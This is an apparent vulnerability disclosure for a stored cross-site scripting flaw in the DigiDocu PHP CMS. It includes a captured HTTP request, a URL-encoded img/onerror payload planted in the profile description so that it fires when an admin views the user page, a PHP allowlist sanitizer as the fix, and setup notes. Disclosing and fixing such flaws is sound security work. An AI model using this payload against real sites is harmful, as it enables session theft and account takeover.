Cross-site Scripting (XSS) - Stored in harish81/digidocu

Valid

Reported on

Mar 30th 2021


✍️ Description

DigiDocu is a CMS written in PHP using the Laravel framework. Laravel uses the Blade templating engine, which escapes HTML output by default. DigiDocu, however, deliberately renders some HTML content without validating the input that comes from the user's profile, i.e. users can write HTML in the description field of their profile. A WYSIWYG editor lets users produce this HTML without typing it, but the browser still sends raw HTML behind the scenes, and that HTML can be manipulated freely before it reaches the server.

🕵️‍♂️ Proof of Concept

As a low-privileged user, log in and go to /admin/profile

Submit the form while capturing the request in a proxy such as Burp Suite

Your request should look like:

POST /admin/profile HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
Origin: http://localhost:8000
DNT: 1
Connection: close
Referer: http://localhost:8000/admin/profile
Cookie: [REDACTED]
Upgrade-Insecure-Requests: 1

_token=Q4ETEwXTbRdzZZbpvFasb5xdGsIbj5UTRlkZCcKf&name=test&email=test%40test.test&username=test&address=&description=%3Cp%3Etest%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1&btnprofile=btnprofile

Replace the description parameter's value with %3cp%3etest%20%3cimg%20src%3d%22http%3a%2f%2fexample.com%22%20onerror%3d%22alert(1)%22%3e%3cbr%3e%3c%2fp%3e. Now send the request.

The payload is now stored and rendered at http://localhost:8000/admin/users/2, where 2 is the attacker's user id. As soon as an admin opens that page, the XSS alert pops up.
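One way to neutralize the stored payload above is to pass the description through an allowlist-based HTML sanitizer before it is saved or rendered. The code below is an added example, not DigiDocu's own code; the function names and the set of allowed tags and attributes are assumptions chosen for a profile bio (in a real Laravel project a maintained library such as HTMLPurifier does the same job).

```php
<?php
// Added example (not DigiDocu's code): allowlist sanitizer for the WYSIWYG
// "description" field. Allowed tags/attributes are assumptions for a bio field.
const ALLOWED_TAGS  = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a', 'img'];
const ALLOWED_ATTRS = ['a' => ['href', 'title'], 'img' => ['src', 'alt']];

function sanitizeDescription(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // user HTML is often malformed; ignore warnings
    // Wrap the fragment so it parses as one tree; the PI forces UTF-8 handling.
    $doc->loadHTML('<?xml encoding="utf-8"?><div>' . $html . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    $root = $doc->documentElement; // the wrapper <div>
    cleanNode($root);
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function cleanNode(DOMNode $node): void
{
    // Work on a static copy: the live NodeList shifts as children are removed.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!in_array($tag, ALLOWED_TAGS, true)) {
                // Disallowed element (script, iframe, ...): keep only its text.
                $text = $child->ownerDocument->createTextNode($child->textContent);
                $node->replaceChild($text, $child);
                continue;
            }
            $allowed = ALLOWED_ATTRS[$tag] ?? [];
            foreach (iterator_to_array($child->attributes) as $attr) {
                $name = strtolower($attr->name);
                // Drops every on* handler (onerror, onload, ...) plus style/class,
                // and any href/src that is not a plain http(s) URL.
                if (!in_array($name, $allowed, true) || !safeUrl($name, $attr->value)) {
                    $child->removeAttribute($attr->name);
                }
            }
            cleanNode($child);
        } elseif (!($child instanceof DOMText)) {
            $node->removeChild($child); // comments, processing instructions
        }
    }
}

function safeUrl(string $attr, string $value): bool
{
    if ($attr !== 'href' && $attr !== 'src') {
        return true;
    }
    // Absolute http(s) only: rejects javascript:, data:, vbscript: and friends.
    return (bool) preg_match('#^https?://#i', trim($value));
}

// The decoded payload from the PoC above, sanitized before storage.
echo sanitizeDescription('<p>test <img src="http://example.com" onerror="alert(1)"><br></p>'), "\n";
```

The onerror attribute is stripped while the paragraph, image and line break the editor legitimately produces survive, so the WYSIWYG feature keeps working.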

💥 Impact

This is a stored XSS vulnerability. It can be used to escalate privileges, take over accounts, or be chained with other bugs that could lead to remote code execution.

For the Fixer

Before you start installing this package, note that it requires PHP 7.2, which has reached end of life, so the default PHP version in your distribution's package manager is probably not 7.2. Check your PHP version before continuing.

If you don't have PHP 7.2, either install PHP 7.2 or bump the PHP version in composer.json to your installed PHP version.

Be cautious with bumping, though, as newer versions might lack some functions used within this package, so installing PHP 7.2 is recommended over tinkering with composer.json. If you have PHP 7.3, it is fine to edit composer.json and update the required version to 7.3. If you have updated composer.json, run composer update to reinstall the dependencies.

Whichever PHP version you use, make sure to run all composer commands with that PHP version, i.e. if you have PHP 8 but also installed PHP 7.2, your php executable very likely points to version 8. So instead of running composer commands directly, run composer as

php72 $(which composer) --version

This way composer will see PHP 7.2 and not version 8.

Now you can continue to install this package using these instructions: https://github.com/harish81/digidocu#installation.
